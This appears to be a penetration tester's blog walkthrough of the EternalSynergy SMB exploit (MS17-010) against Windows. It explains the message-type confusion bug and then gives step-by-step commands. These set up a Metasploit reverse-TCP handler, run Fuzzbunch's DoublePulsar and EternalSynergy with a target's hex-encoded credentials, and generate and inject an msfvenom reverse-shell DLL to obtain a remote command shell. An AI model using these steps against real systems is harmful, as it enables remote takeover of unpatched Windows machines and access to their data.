Eternal Series - Part 4 | Eternal Synergy Remote Windows Exploitation
Abhijeet Singh
Penetration Tester || Cyber Security Researcher || Cyber Security Consultant || OSCP || eJPT || APISec || Speaker || Offensive Tradecraft
Introduction
Eternal Synergy is an SMBv3 authenticated exploit. Many of the exploitation steps are purely packet-based, as opposed to local shellcode execution. Like the other SMB vulnerabilities, this one was also addressed in MS17-010 as CVE-2017-0143. The exploit works up to Windows 8, but does not work against any newer platforms.
Vulnerability
MID (Multiplex ID)
The MID is assigned by the client. All messages include a MID along with a PID (process ID, see below) to uniquely identify groups of commands belonging to the same logical thread of operation on the client node.
FID (File ID)
A file handle, representing an open file on the server. A FID returned from an Open or Create operation MUST be unique within an SMB connection.
UID (User ID)
A UID represents an authenticated SMB session (including those created using anonymous or guest authentication).
PID (Process ID)
The PID is assigned by the client. The client SHOULD set this to a value that identifies the process on the client node that initiated the request.
TID (Tree ID)
A TID represents an open connection to a share, otherwise known as a tree connect.
SMB_COM_WRITE_ANDX
This request is used to write bytes to a regular file, a named pipe, or a directly accessible I/O device such as a serial port (COM) or printer port (LPT).
SMB_COM_TRANSACTION_SECONDARY
The SMB_COM_TRANSACTION_SECONDARY command is used to complete a data transfer initiated by an SMB_COM_TRANSACTION Request.
- The root cause of this vulnerability stems from not taking the command type of an SMB message into account when determining if the message is part of a transaction. In other words, as long as the SMB header UID, PID, TID and OtherInfo fields match the corresponding transaction fields, the message would be considered to be part of that transaction.
- Usually, the OtherInfo field stores a MID. In the case of SMB_COM_WRITE_ANDX messages, however, it stores a FID instead. This creates a potential message type confusion: Given an existing SMB_COM_WRITE_ANDX transaction, an incoming SMB message with MID equal to the transaction FID would be included in the transaction.
- When a SMB message arrives, the appropriate handler will copy its contents into the corresponding transaction buffer, namely InData. The SMB_COM_TRANSACTION_SECONDARY handler assumes that the InData address points to the start of the buffer.
- However, in the case of a SMB_COM_WRITE_ANDX transaction, each time a SMB is received for that transaction, the InData address is updated to point to the end of the existing data.
- Leveraging the packet confusion, an attacker can insert a SMB_COM_TRANSACTION_SECONDARY message into a SMB_COM_WRITE_ANDX transaction. In that case, the InData will point past the start of the buffer, and so the SMB_COM_TRANSACTION_SECONDARY handler can overflow the buffer during copying the incoming message data.
- A series of SMB_COM_TRANSACTION messages are sent in order to allocate a pair of neighboring control-victim transactions. Specifically, "groom” packets contain SMB messages crafted to create the packet confusion, or in other words, eligible to be a control transaction. "Bride" packets create transactions that are candidates for corruption, that is, victim transactions.
- The read primitive is exercised multiple times, in order to discover the location of the srv!SrvTransaction2DispatchTable global pointer, used trigger shellcode execution.
- The read primitive is again exercised multiple times to discover the base of ntoskrnl.exe. The RWX memory found above is used as a scratch page, where shellcode is written and executed and return values are stored.
- First, using the write primitive, the exploit shellcode is copied to the scratch page. Then, a SMB_COM_TRANSACTION2 message is sent to execute the shellcode. The return value is saved at a fixed offset on the scratch page and leaked back to the attacker using the Read Primitive.
- Lastly, the scratch page is cleared, the attacker-provided shellcode is written to the pool-allocated page and a message is sent to trigger execution.
Exploit
Step 1 : Setup Metasploit
#use exploit/multi/handler
#set payload windows/x64/shell/reverse_tcp
#set LHOST <Internal IP>
#exploit
Step 2 : Setup Fuzzbunch
#Default Target IP Address [] : <Target IP>
#Default Callback IP Address [] : <Internal IP>
#Use Redirection [yes] : no
Press Enter
Create a New Project
#use DoublePulsar
Press Enter 5 times
Set x64 architecture : 1
Press Enter once
Set path of output file : c:\shell.bin
Press Enter 3 times
DoublePulsar Succeeds!!!
#use EternalSynergy
Press Enter 6 times
Choose Password in Credentials Menu (Option 3)
Convert Target users Username into Hex format
Enter the Hex value for Username
Convert Target users Password into Hex format
Enter the Hex Value for Password
Press Enter 7 times
Enter path to shell.bin : c:\shell.bin
Press Enter once
Press Enter 9 times
EternalSynergy will start executing…
EternalSynergy Succeeds!!!
Switch to terminal and generate a msfvenom payload dll
#msfvenom -p windows/x64/shell/reverse_tcp lhost=<Internal IP> lport=<Port> -f dll > exploit.dll
Switch to Fuzzbunch
#use DoublePulsar
Press Enter 6 times
Set Function : 2
Set path to DLL Payload : c:\exploit.dll
Press Enter 6 times
DoublePulsar will start executing…
Success
We get a Command Shell Session.